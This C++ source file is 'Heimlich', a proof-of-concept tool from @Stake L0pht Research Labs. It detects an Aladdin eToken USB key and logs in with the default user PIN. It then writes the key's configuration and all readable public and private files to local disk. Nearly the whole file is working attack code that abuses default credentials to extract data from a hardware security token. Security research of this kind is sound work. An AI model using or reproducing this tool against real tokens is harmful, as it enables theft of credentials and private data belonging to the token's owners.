/******************************************************************************
 * 
 * Heimlich: Aladdin eToken USB Key Data Extractor
 * kingpin@atstake.com
 * @Stake L0pht Research Labs
 * http://www.atstake.com
 *
 * Version	1.0
 * Date		4.19.00
 *
 * This proof-of-concept tool will perform the following functions:
 *
 * 1) Search USB ports for eToken
 * 2) Retrieve and display configuration data for the inserted key
 * 3) Login as User using the default PIN of 0xFFFFFFFFFFFFFFFF
 * 4) Retrieve all public and private data and export the directory hierarchy
 *	  to DOS
 *
 ******************************************************************************/

#include <direct.h>
#include <windows.h>
#include <vector>
#include <algorithm>
using namespace std;
#include "Include\etoken1\eToken_1.h"
#include "Include\eToken1\eTAppAdapter.h"

// defines

#define CONFIG_FILENAME "CONFIG" // filename

// globals 

eTAppAdapter	*m_etoken;
long			slot_id = -1;

// declarations

int enum_directory (const string& path);

int main (int argc, char *argv[])
{
	eTConfigData	cd;
	eT_ERROR		err = -1;
	FILE			*file;
	string			curDir; // root directory for file system traversal
	vector<eT_SLOT_ID>	sl; // slot list
	BOOL			is_there;

	fprintf(stdout, "\nHeimlich: Aladdin eToken USB Key Data Extractor\n\n");
	fprintf(stdout, "kingpin@atstake.com\n");
	fprintf(stdout, "@Stake L0pht Research Labs\n");
    fprintf(stdout, "http://www.atstake.com\n\n");

	// do any additional startup routines here

	m_etoken = new eTAppAdapter (err); // instantiate object
	if (err != eT_E_SUCCESS)
	{
		m_etoken = NULL;
		m_etoken -> show_eTError (err);
		return 1;
	}

	m_etoken -> startSlots (); // start the slot threads
	err = m_etoken -> getSlotList (TRUE, sl); // get status of all slots
	if (err) 
	{
		m_etoken -> show_eTError (err);
		return 1;
	}

	// look for first slot with eToken attached
	for (int i = 0; i < sl.size(); i++)
	{
		m_etoken -> isToken (sl[i], is_there); // is token there?
		if (is_there) // yes
		{
			slot_id = sl[i];
			break;
		}
	}

	if (slot_id == -1)
	{
		fprintf(stderr, "eToken not found\n\n");
		return 1;
	}
	else
		fprintf(stdout, "eToken found on Slot %d\n\n", slot_id);

	// get configuration data
	err = m_etoken -> getTokenConfigData (slot_id, cd);
	if (err) 
	{
		m_etoken -> show_eTError (err);
		return 1;
	}

	if ((file = fopen(CONFIG_FILENAME, "w")) == NULL) // create file
	{
		fprintf(stderr, "Unable to create %s\n\n", CONFIG_FILENAME);			
		return 1;
	}
	
	fprintf(stdout, "tokenId = %s\n", cd.tokenId.c_str());
	fprintf(stdout, "slotid = %d\n", cd.slotid);
	fprintf(stdout, "isConfigured = %d\n", cd.isCofigured);
	fprintf(stdout, "verMajor = %d\n", cd.verMajor); // see version extraction macros (eToken_1.h)
	fprintf(stdout, "verMinor = %d\n", cd.verMinor); // see version extraction macros (eToken_1.h)
	fprintf(stdout, "color = %d\n", cd.color);
	fprintf(stdout, "fsSize = %d\n", cd.fsSize);
	fprintf(stdout, "publicSize = %d\n", cd.publicSize);
	fprintf(stdout, "privateSize = %d\n", cd.privateSize);
	fprintf(stdout, "secretSize = %d\n", cd.secretSize);
	fprintf(stdout, "freePublicSize = %d\n", cd.freePublicSize);
	fprintf(stdout, "freePrivateSize = %d\n", cd.freePrivateSize);
	fprintf(stdout, "freeSecretSize = %d\n", cd.freeSecretSize);
	fprintf(stdout, "secretGranularity = %d\n", cd.secretGranularity);
	fprintf(stdout, "fat = %d\n", cd.fat);
	fprintf(stdout, "maxfat = %d\n", cd.maxfat);
	fprintf(stdout, "maxAdmin = %d\n", cd.maxAdmin);
	fprintf(stdout, "maxUser = %d\n\n", cd.maxUser);

	fprintf(file, "tokenId = %s\n", cd.tokenId.c_str());
	fprintf(file, "slotid = %d\n", cd.slotid);
	fprintf(file, "isConfigured = %d\n", cd.isCofigured);
	fprintf(file, "verMajor = %d\n", cd.verMajor); // see version extraction macros (eToken_1.h)
	fprintf(file, "verMinor = %d\n", cd.verMinor); // see version extraction macros (eToken_1.h)
	fprintf(file, "color = %d\n", cd.color);
	fprintf(file, "fsSize = %d\n", cd.fsSize);
	fprintf(file, "publicSize = %d\n", cd.publicSize);
	fprintf(file, "privateSize = %d\n", cd.privateSize);
	fprintf(file, "secretSize = %d\n", cd.secretSize);
	fprintf(file, "freePublicSize = %d\n", cd.freePublicSize);
	fprintf(file, "freePrivateSize = %d\n", cd.freePrivateSize);
	fprintf(file, "freeSecretSize = %d\n", cd.freeSecretSize);
	fprintf(file, "secretGranularity = %d\n", cd.secretGranularity);
	fprintf(file, "fat = %d\n", cd.fat);
	fprintf(file, "maxfat = %d\n", cd.maxfat);
	fprintf(file, "maxAdmin = %d\n", cd.maxAdmin);
	fprintf(file, "maxUser = %d\n\n", cd.maxUser);

	fclose (file);

	fprintf(stdout, "Attempting eToken User login with Default PIN...");

	err = m_etoken -> login (slot_id, (const char *) ET_1_DEFPIN, eT_User, TRUE);
	if (err) 
	{
		fprintf(stdout, "Failed!\n\n");
		m_etoken -> show_eTError (err);
		return 1;
	}
	else
		fprintf(stdout, "Success!\n\n");

	// traverse hierarchy and clone file system and all data
	m_etoken -> getCurrentDir (slot_id, curDir); // start from root directory
	if (enum_directory (curDir))
	{
		fprintf(stderr, "\nUnable to export file system.\n\n");
		return 1;
	}

	err = m_etoken -> logout (slot_id);
	if (err) 
	{
		m_etoken -> show_eTError (err);
		return 1;
	}

	fprintf(stdout, "\nHeimlich maneuver complete. File system successfully exported.\n\n");
	
	return 0;
}

int enum_directory (const string& path)
{
	vector<eTFileInfo> filesInfo;
	eT_ERROR		err = -1;
	FILE			*file;

	mkdir (path.c_str()); // create directory in DOS
	chdir (path.c_str()); // change into directory
	m_etoken -> changeDir (slot_id, path);
	fprintf(stdout, "dir = %s\n", path.c_str());

	// for all files
	m_etoken -> listFiles (slot_id, filesInfo);
	for (int i = 0; i < filesInfo.size(); i++)
	{
		if (filesInfo[i].file_type == e_Directory)
			enum_directory (filesInfo[i].name.c_str()); // recursive
		else if (filesInfo[i].file_type == e_File)
		{
			vector<BYTE> fileData;

			fprintf(stdout, "file = %s\n", filesInfo[i].name.c_str());
			if ((file = fopen(filesInfo[i].name.c_str(), "wb")) == NULL) // create file
			{
				fprintf(stderr, "\nUnable to create %s\n\n", filesInfo[i].name.c_str());			
				return 1;
			}

			// read file and export to DOS
			if (!filesInfo[i].isSecret()) // attempting to read a secret file will generate error, since they are write-only
			{
				err = m_etoken -> readFile (slot_id, filesInfo[i].name.c_str(), 0, filesInfo[i].file_size, fileData);
				if (err) 
				{
					m_etoken -> show_eTError (err);
					return 1;
				}
			
				for (int j = 0; j < fileData.size(); j++)
				{
					if (fwrite (&fileData[j], 1, 1, file) != 1)
					{
						fprintf(stderr, "\nError writing to %s\n\n", filesInfo[i].name.c_str());
						return 1;
					}
				}
			}

			fclose (file);
		}
	}

	m_etoken -> upDir (slot_id);
	chdir (".."); 

	return 0;
}
